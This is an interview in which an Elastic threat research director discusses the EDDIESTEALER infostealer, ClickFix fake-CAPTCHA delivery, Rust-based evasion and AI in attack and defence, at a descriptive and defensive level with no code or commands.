In an age where malware mimics trust and outsmarts tech, EDDIESTEALER represents a chilling evolution. In this exclusive conversation with CISO Forum, Devon Kerr, Director of Threat Research at Elastic, reveals how modern infostealers are no longer just about exploiting code—they’re exploiting human instinct. From fake CAPTCHA traps to Rust-based stealth and AI-powered deception, attackers are now using everyday user behavior as their entry point. Kerr warns of a new malware paradigm, one where detection is no longer about firewalls but foresight. As cybersecurity enters an AI-versus-AI era, organisations must rethink protection—before trust becomes their greatest vulnerability.
Director of Threat Research
Elastic
CISO Forum: EDDIESTEALER leverages fake CAPTCHA prompts to trick users — what does this reveal about the future of human-targeted malware tactics and social engineering?
Devon Kerr: EDDIESTEALER’s use of fake CAPTCHA prompts shows just how creative threat actors are using social engineering. ClickFix appears to be the delivery method of choice when it comes to malware. Threat actors have widely used this technique. It involves deceiving users into pressing buttons in dialogue boxes to “fix” non-existent computer issues or mimicking a familiar “I’m not a robot” verification flow. Doing so automatically copies malicious script to the user’s clipboard, who is then tricked into pasting and running the code to bypass traditional perimeter defences completely.
This ClickFix tactic blurs the line between tech trickery and psychological manipulation, exploiting our trust in routine web interactions. What’s particularly insidious about this technique is that it capitalises on human nature to address an issue when presented with a solution swiftly.
Rust optimises binaries and enables the use of encrypted strings and custom API resolvers that complicate reverse engineering. Combine that with sandbox checks, file self‑deletion, and alternate‑data‑stream tricks, and you’ve got a malware strain built to slip through detection and analysis unnoticed.
We are now looking at a new wave of malware that weaponises user interaction as much as code flaws. Humans are the weak link, and attackers know it. Organisations must use a holistic approach to cybersecurity, one that utilises tools that ensure users do not self-sabotage in addition to individual vigilance, and is backed up by powerful technologies.
CISO Forum: How are modern infostealers evolving in capability and stealth, especially in the post-COVID digital ecosystem dominated by browsers, crypto wallets, and cloud apps?
Devon Kerr: Modern infostealers have grown far more capable and discreet, evolving rapidly in our post‑COVID digital ecosystem, which is defined by browsers, crypto wallets, and cloud apps. The shift to remote and hybrid work means each laptop, often loaded with personal and corporate logins, is now a valuable target. Attackers capitalise on this by bundling malware inside fake browser extensions, pirated downloads, and phishing kits that deliver multi‑stage loaders to breach everything from browser credentials to active session tokens, SSO cookies, MFA codes, and even seed phrases for crypto wallets.
Infostealers like AWRETCHCLIENT and BANSHEE take this further. They use encrypted payloads, stealthy in-memory execution, and remote debugging tricks to grab cookies, session tokens, even crypto wallet seeds, without triggering alarms.
BANSHEE’s emergence has also revealed an alarming trend. For a monthly fee, threat actors can access malware that is capable of collecting a wide variety of data and targets macOS, which has historically been less of a target compared to Windows.
Malware now features modular payloads, leverages malware-as-a-service, and spreads stealthily through trusted platforms like Google Drive while targeting both personal devices and enterprise cloud systems.
Malware has become quieter, its persistence shorter, and its exfiltration methods faster, with signals buried deeper than ever. Defending against this new reality requires a proactive approach, not just reactive detection. Organisations need to deploy security solutions that deliver fast, data-driven analytics directly within their Security Information and Event Management by leveraging data gathered across their entire attack surface. This will enable security teams to identify threats earlier and respond faster without the need to collect data.
The ability to act upon the data is just as essential; having the right tools that can be deployed immediately will empower an organisation to repel an intrusion or evict a threat swiftly.
CISO Forum: With AI increasingly embedded into both defense tools and offensive malware campaigns, how do you see this AI-versus-AI dynamic reshaping threat landscapes?
Devon Kerr: The AI arms race is being fought on many fronts, with cybersecurity being one of them. The use of AI on both offence and defence is fundamentally changing the cybersecurity landscape.
Threat actors have been using AI to bypass defenses in some cases, while cybersecurity professionals are using AI to detect and counteract these advanced tactics. This dynamic drives rapid innovation on both sides, with each seeking to outpace the other.
Attackers are using AI to improve their phishing attempts and to obfuscate communication with implants, but are rapidly learning that AI has much greater potential.
Cybersecurity professionals have responded in kind with AI-driven detection and response, where they leverage AI to identify threats, correlate alerts in real time, and automate incident response.
Elastic Security is designed to capitalise on rich and diverse data with security analytics and AI-powered capabilities that improve detection engineering and real-time alert correlation. In significant ways, security teams are leveraging these features to detect emerging and conventional threats effectively.
CISO Forum: Rust is being adopted by malware authors for its stealth and performance benefits. What makes Rust-based malware like EDDIESTEALER harder to detect and analyse?
Devon Kerr: Rust-based malware, such as EDDIESTEALER, presents unique challenges for detection and analysis because Rust produces highly optimised, monolithic binaries with minimal metadata, making it harder to extract meaningful information or function names during analysis.
The fact that Rust can easily target multiple platforms (Windows, macOS, Linux), allowing malware authors to reuse code and techniques across environments, complicates detection efforts.
CISO Forum: Many ransomware and infostealer attacks now bypass traditional detection by abusing trusted user actions. Is endpoint protection fundamentally due for a rethink?
Devon Kerr: Many modern attacks no longer rely on breaking technical barriers; they exploit trusted user actions or legitimate platforms and tools. Malware like EDDIESTEALER uses fake CAPTCHA prompts to trick users into copying and running malicious code themselves, bypassing traditional detection entirely.
Endpoint protection is just as important as it has ever been. However, what organisations should be looking at is how current Endpoint Detection and Response (EDRs) solutions can be further improved, given how adversaries are spending more of their efforts targeting users and executing malware in unconventional ways that current solutions cannot detect.
Modern EDRs will need to get eyes in those places. One example is user and entity behavior analytics (UEBA), a security solution that uses behavioural analytics to detect suspicious activity based on behaviour, not just known signatures. This includes monitoring non-user entities, including servers, routers, and Internet of Things (IoT) devices for unusual process injections, fileless attacks, and anomalous user actions.
CISO Forum: Beyond EDDIESTEALER, what larger trends do you see in malware delivery vectors — are CAPTCHAs just the beginning of a new wave of behavioral deception?
Devon Kerr: Elastic researchers are spotting a clear trend in malware delivery: a shift from technical exploitation to behavioural manipulation. Elastic’s telemetry shows a surge in “ClickFix–style” campaigns, where benign actions like copy-paste PowerShell commands become the vector for infostealers and Remote Access Trojans (RAT), malware designed to allow an attacker to control an infected computer remotely. More threat actors are turning to ClickFix and fake CAPTCHA systems to deliver malware without having to deal with traditional software vulnerabilities.
The updated GHOSTPULSE loader, for instance, conceals its encrypted payload inside the pixels of a PNG image, then tricks users via CAPTCHA-style shortcuts to activate it.
We are entering a new era where more fake CAPTCHA attacks will embed the payload within various file types, such as images, documents, and even audio files like MP3. This malware will be distributed via identified methods like phishing emails or malvertising on untrusted websites. Still, we might start to see such CAPTCHA links being shared through social media platforms.
While self-infection via ClickFix will continue to be one of the significant trends we see for initial compromise, organisations must continue safeguarding themselves against other forms of initial compromise, such as edge exploitation and supply chain compromise.
